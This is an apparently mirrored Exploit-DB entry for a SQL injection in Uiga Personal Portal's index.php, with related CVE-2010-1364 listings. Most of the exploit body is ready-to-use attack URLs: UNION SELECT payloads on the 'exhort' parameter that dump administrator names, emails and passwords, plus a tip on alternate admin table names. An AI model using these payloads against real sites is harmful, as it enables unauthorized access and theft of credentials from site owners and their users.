Lucene search
41.w4r10rEDB-ID:12399HistoryApr 26, 2010 - 12:00 a.m.
Uiga Personal Portal - 'index.php' 'view' SQL Injection
2010-04-2600:00:00
41.w4r10r
www.exploit-db.com
18
AI Score
7.4
Confidence
Low
# Exploit Title: Uiga Personal Portal index.php (view) SQL Injection
Vulnerability
# Date: 27-4-2010
# Author: 41.w4r10r
# Software Link :
http://www.scriptdevelopers.net/download/uigapersonalportal.zip
# Version: Web Application
# Tested on: Apcahe/Unix
# CVE : [if exists]
# Dork :
# Code :
Exploited Link :
http://[site]/uigaportal/index.php?view=ar_det&exhort=-36'
Examples :
http://[site]/product/demo/uigaportal/index.php?view=ar_det&exhort=-36+union+select+all+1,2,3,4,5,6,gr
oup_concat(admin_name,0x3a,admin_password),8,9,10,11+from+admin--
http://[site]/index.php?view=ar_det&exhort=-36+union+select+all+1,2,3,4,5,6,group_concat(admin_ema
il,0x3a,admin_password),8,9,10,11+from+tbl_admin--
Important: Sometimes the table name is administrators and sometimes its
adminRelated
prion
prion
Sql injection
2010-04-13 20:30:00
nvd
nvd
CVE-2010-1364
2010-04-13 20:30:00
exploitdb
exploitdb
Uiga Personal Portal - 'index.php' SQL Injection
2010-02-28 00:00:00
cve
cve
CVE-2010-1364
2010-04-13 20:30:00
cvelist
cvelist
CVE-2010-1364
2010-04-13 20:20:00